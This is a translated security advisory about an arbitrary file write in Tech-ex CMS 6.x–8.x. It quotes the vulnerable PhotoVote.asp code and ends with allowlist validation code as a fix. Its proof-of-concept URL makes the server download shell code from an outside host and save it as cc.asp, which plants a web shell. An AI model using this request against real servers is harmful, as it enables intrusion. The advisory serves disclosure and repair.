Tech-ex 6.x~8.x getshell 0day - vulnerability warning - the black bar safety net

2013-04-08T00:00:00
ID MYHACK58:62201338182
Type myhack58
Reporter Anonymous
Modified 2013-04-08T00:00:00

Description

Brief description:

The submitted parameters are not validated, so an arbitrary file can be written to the server...

Detailed description:

Wap/Plus/PhotoVote.asp 14-23

    Dim KS:Set KS=New PublicCls
    Dim ID:ID = Replace(KS.S("ID")," ","")
    Dim ChannelID:ChannelID=KS.G("ChannelID")
    If ChannelID="" Then ChannelID=2
    ' Both values come straight from the request
    If KS.G("LocalFileName")<>"" And KS.G("RemoteFileUrl")<>"" Then
        If KS.SaveBeyondFile(KS.G("LocalFileName"),KS.G("RemoteFileUrl"))= True Then
            Response.write KS.G("LocalFileName") 'error message
        End If
    End If

Code omitted......

    '==================================================
    'Process name: SaveBeyondFile
    'Action: save the remote file to the local
    'Parameters: LocalFileName ------ the local file name
    'Parameters: RemoteFileUrl ------ the remote file URL
    '==================================================
    Function SaveBeyondFile(LocalFileName,RemoteFileUrl)
        On Error Resume Next
        SaveBeyondFile=True
        Dim Ads,Retrieval,GetRemoteData
        Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
        With Retrieval
            .Open "Get", RemoteFileUrl, False, "", ""
            .Send
            If .Readystate<>4 Then
                SaveBeyondFile=False
                Exit Function
            End If
            GetRemoteData = .ResponseBody
        End With
        Set Retrieval = Nothing
        Set Ads = Server.CreateObject("Adodb.Stream")
        With Ads
            .Type = 1
            .Open
            .Write GetRemoteData
            .SaveToFile server.MapPath(LocalFileName),2
            .Cancel()
            .Close()
        End With
        If Err.Number<>0 Then
            Err.Clear
            SaveBeyondFile=False
            Exit Function
        End If
        Set Ads=nothing
    End Function

The key lines in the code above are these:

    If KS.G("LocalFileName")<>"" And KS.G("RemoteFileUrl")<>"" Then
        If KS.SaveBeyondFile(KS.G("LocalFileName"),KS.G("RemoteFileUrl"))= True Then
            Response.write KS.G("LocalFileName") 'error message
        End If
    End If

KS.G("LocalFileName") and KS.G("RemoteFileUrl") are only checked for being empty and filtered for some SQL characters, and then the file is written directly!

Vulnerability proof:

After logging in, visit: http://www.t00ls.net/Wap/Plus/PhotoVote.asp?LocalFileName=cc.asp&RemoteFileUrl=http://www.bksec.net/1.txt

This successfully writes cc.asp under Wap/Plus and returns the file name; 1.txt contains the shell code.

Repair solutions:

Validate and filter the parameters; you know how.
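One way to implement the validation this fix calls for, shown as an added example that is not the vendor's or the original author's code. It replaces the vulnerable If block in PhotoVote.asp; the helper names, the SAFE_DIR path and the image-only extension allowlist are assumptions.

```vbscript
' Added example: hypothetical helpers, not the vendor's code.
' Assumption: the feature only needs to store images, in one fixed folder
' that IIS is configured not to execute scripts from.
Const SAFE_DIR = "/UploadFiles/PhotoVote/"   ' assumed path

' True only for a bare file name with an allowlisted image extension.
' Rejects path separators, "..", ";" and ":" and any second dot,
' so names such as cc.asp, ../x.asp or a.asp;.jpg never reach MapPath.
Function IsSafeLocalName(ByVal name)
    Dim re : Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "^[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|gif|png)$"
    IsSafeLocalName = re.Test(name)
End Function

' True only for plain http(s) URLs whose path ends in an image extension.
' This does not restrict the host; if the legitimate sources are known,
' compare the host against a fixed list as well.
Function IsSafeRemoteUrl(ByVal url)
    Dim re : Set re = New RegExp
    re.IgnoreCase = True
    re.Pattern = "^https?://[A-Za-z0-9.-]+(:\d{1,5})?/[A-Za-z0-9/_.-]*\.(jpg|jpeg|gif|png)$"
    IsSafeRemoteUrl = re.Test(url)
End Function

Dim LocalName, RemoteUrl
LocalName = KS.G("LocalFileName")
RemoteUrl = KS.G("RemoteFileUrl")
If LocalName <> "" And RemoteUrl <> "" Then
    If IsSafeLocalName(LocalName) And IsSafeRemoteUrl(RemoteUrl) Then
        ' The destination folder is chosen by the server, never by the request.
        If KS.SaveBeyondFile(SAFE_DIR & LocalName, RemoteUrl) = True Then
            Response.Write Server.HTMLEncode(LocalName)
        End If
    Else
        Response.Status = "400 Bad Request"
        Response.End
    End If
End If
```

With these checks the request shown under "Vulnerability proof" is rejected, because cc.asp fails the file-name allowlist and 1.txt fails the URL allowlist.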